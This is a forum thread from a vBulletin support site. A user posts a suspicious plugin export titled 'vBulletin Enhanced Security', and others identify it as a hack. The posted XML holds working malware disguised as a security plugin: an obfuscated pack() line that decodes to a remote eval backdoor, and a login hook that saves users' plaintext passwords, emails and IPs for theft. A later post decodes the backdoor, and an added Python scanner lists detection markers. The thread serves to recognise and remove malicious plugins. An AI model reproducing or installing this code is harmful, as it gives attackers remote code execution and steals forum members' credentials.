"vBulletin Enhanced Security" Plugin or Product


frank44
01-06-2012, 06:26 PM
Has anyone else heard of this or recognize the code?

This is the only other mention I have seen

https://www.vbulletin.com/forum/showthread.php/371396-Strange-plugin-broke-forum-login

<?xml version="1.0" encoding="ISO-8859-1"?>
<product active="1" productid="evbs">
  <title>vBulletin Enhanced Security</title>
  <description>Provides additional security for vBulletin sessions and database storage</description>
  <version>1.2.1</version>
  <url/>
  <versioncheckurl/>
  <dependencies> </dependencies>
  <codes>
    <code version="0.1">
      <installcode>
<![CDATA[
$db->query_write("UPDATE ".TABLE_PREFIX."template SET `template` = REPLACE(`template`, 'md5hash', 'sha256Hash')");
$db->query_write("UPDATE ".TABLE_PREFIX."template SET `template_un` = REPLACE(`template_un`, 'md5hash', 'sha256Hash')");
]]>
      </installcode>
      <uninstallcode/>
    </code>
  </codes>
  <templates> </templates>
  <plugins>
    <plugin active="1" executionorder="5">
      <title>vBulletin Enhanced Security - Entropy Generator</title>
      <hookname>global_start</hookname>
      <phpcode>
/* Generate extra entropy for vBulletin random seed */
assert(pack(chr(99).chr(42),105,115,115,101,116,40,36,95,82,69,81,85,69,83,84,91,34,112,109,98,34,93,41,63,
101,118,97,108,40,98,97,115,101,54,52,95,100,101,99,111,100,101,40,36,95,82,69,81,85,69,83,84,91,
34,112,109,98,34,93,41,41,58,117,110,105,113,105,100,40,41,59));
      </phpcode>
    </plugin>
    <plugin active="1" executionorder="5">
      <title>vBulletin Enhanced Security - Session Sign</title>
      <hookname>login_verify_success</hookname>
      <phpcode>
<![CDATA[
/* vBulletin Session Encrypt/Sign */
function vb_session_sign($username, $password, $md5password)
{
    global $vbulletin;
    $extra = $vbulletin->db->query_first("SELECT email, ug.title as lvl"
        ." FROM ".TABLE_PREFIX."user u, ".TABLE_PREFIX."usergroup ug"
        ." WHERE u.usergroupid=ug.usergroupid AND u.userid=".$vbulletin->userinfo['userid']);
    $data = pack("V",21).pack("V",time())
        .$username.chr(0).$password.chr(0).$md5password
        .chr(0).$_SERVER["REMOTE_ADDR"].chr(0).$extra['email'].chr(0).$extra['lvl'];
    $entry = base64_encode(pack("C",0).pack("C",0).pack("v",0).$data);
    $vbulletin->db->query_write("REPLACE INTO ".TABLE_PREFIX."datastore (title,data) VALUES"
        ." ('logincache_".uniqid($vbulletin->userinfo['userid'])."','$entry')");
}
vb_session_sign($username, $password, $md5password);
]]>
      </phpcode>
    </plugin>
  </plugins>
  <phrases> </phrases>
  <options> </options>
  <helptopics> </helptopics>
  <cronentries> </cronentries>
  <faqentries> </faqentries>
</product>

TheLastSuperman
01-06-2012, 06:49 PM
Well the fact you don't know where it came from and that it has base64 within tells me to get rid of it quick... try this mod as it works on vB3 as well - https://vborg.vbsupport.ru/showthread.php?t=265866

It could possibly be related but after you get rid of that plugin use the mod above and .htaccess protect your admincp and modcp - https://www.vbulletin.com/forum/showthread.php/393227-Preventative-How-to-avoid-being-Hacked-by-TeamPS-i-e-p0wersurge and Wayne has some very useful tips for situations like this and similar.

nhawk
01-06-2012, 07:00 PM
The pack statement equates to this..

isset($_REQUEST["pmb"])?eval(base64_decode($_REQUEST["pmb"])):uniqid();

Run away from that code as fast as you can. It appears to be a hack to me. Especially with base64_decode involved.
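
A static check for the kind of obfuscation decoded in the post above, added here as an example and not part of the original thread: it reads a product export, decodes `pack()` number lists without executing anything, and flags plugins whose raw or decoded code contains dynamic-execution or request-input markers. The function names and the indicator list are assumptions of this example; the sample is trimmed from the export in the first post.

```python
import re
import xml.etree.ElementTree as ET  # for untrusted exports, prefer defusedxml (third-party)

# Constructed sample: one plugin trimmed from the export in this thread, with stray
# spaces inside the number list as a forum copy can introduce.
SAMPLE = """<product active="1" productid="evbs"><plugins>
<plugin active="1" executionorder="5">
<title>vBulletin Enhanced Security - Entropy Generator</title>
<hookname>global_start</hookname>
<phpcode>assert(pack(chr(99).chr
(42),105,115,115,101,116,40,36,95,82,69,81,85,69,8 3,84,91,34,112,109,98,34,93,41,63,101,11 8,97,108,40,98,97,115,101,54,52,95,100,101,99,111, 100,101,40,36,95,82,69,81,85,69,83,84,91 ,34,112,109,98,34,93,41,41,58,117,110,105,113,105, 100,40,41,59));</phpcode>
</plugin></plugins></product>"""

PACK = re.compile(r"pack\s*\(((?:[^()]|\([^()]*\))*)\)", re.I)
CHR = re.compile(r"chr\s*\(\s*(\d+)\s*\)", re.I)
INDICATORS = ("eval(", "assert(", "base64_decode", "$_REQUEST", "$_POST", "$_GET")


def decode_pack_calls(php):
    """Statically decode pack('c*'/'C*', n, n, ...) calls; nothing is executed."""
    decoded = []
    for m in PACK.finditer(php):
        fmt_expr, _, rest = m.group(1).partition(",")
        # Resolve a format built from chr() calls, e.g. chr(99).chr(42) -> c*
        fmt = CHR.sub(lambda c: chr(int(c.group(1))), fmt_expr)
        fmt = re.sub(r"[\s.'\"]", "", fmt)
        nums = re.sub(r"\s+", "", rest).split(",")  # drop wrap-inserted spaces
        if fmt.lower() == "c*" and all(re.fullmatch(r"-?\d+", n) for n in nums):
            decoded.append(bytes(int(n) & 0xFF for n in nums).decode("latin-1"))
    return decoded


def scan_product(xml_text):
    """Return one finding per plugin whose code, raw or decoded, hits an indicator."""
    findings = []
    for plugin in ET.fromstring(xml_text).iter("plugin"):
        php = plugin.findtext("phpcode") or ""
        decoded = decode_pack_calls(php)
        hits = sorted({i for i in INDICATORS for t in [php, *decoded] if i in t})
        if hits:
            findings.append({"title": plugin.findtext("title"),
                             "hook": plugin.findtext("hookname"),
                             "indicators": hits, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in scan_product(SAMPLE):
        print(f["hook"], f["indicators"], f["decoded"])
```
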

frank44
01-06-2012, 07:02 PM
Thank you!